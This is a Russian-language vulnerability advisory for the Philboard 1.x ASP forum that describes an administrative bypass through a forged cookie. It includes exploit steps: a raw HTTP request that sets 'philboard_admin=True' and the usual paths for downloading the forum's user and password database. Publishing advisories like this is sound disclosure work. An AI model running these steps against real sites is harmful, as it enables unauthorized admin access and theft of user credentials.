Удаленный административный доступ в Philboard
| Дата публикации: | 02.06.2003 |
| Дата изменения: | 02.07.2008 |
| Всего просмотров: | 1285 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Обход ограничений безопасности |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Philboard 1.x |
| Описание: | Уязвимость обнаружена в бесплатном ASP форуме Philboard. Удаленный пользователь может получить административные привилегии на системе.
Сообщается, что удаленный пользователь может установить куки форума к "philboard_admin=True;" или "admin=True;", чтобы получить привилегии администратора на системе. Эксплоит: 1) Login Administrator Forum: Use your telnet and open target on port 80 GET /board/philboard_admin.asp HTTP/1.0 Host: target.com Cookie: philboard_admin=True; 2) Download the database (users and password): Usually, the database location can be found and download it from: http://www.target.com/database/philboard.mdb or http://www.target.com/forum/database/philboard.mdbУязвимость обнаружена в Philboard up to v1.14 |
| Ссылки: | Philboard Forum Vulnerability |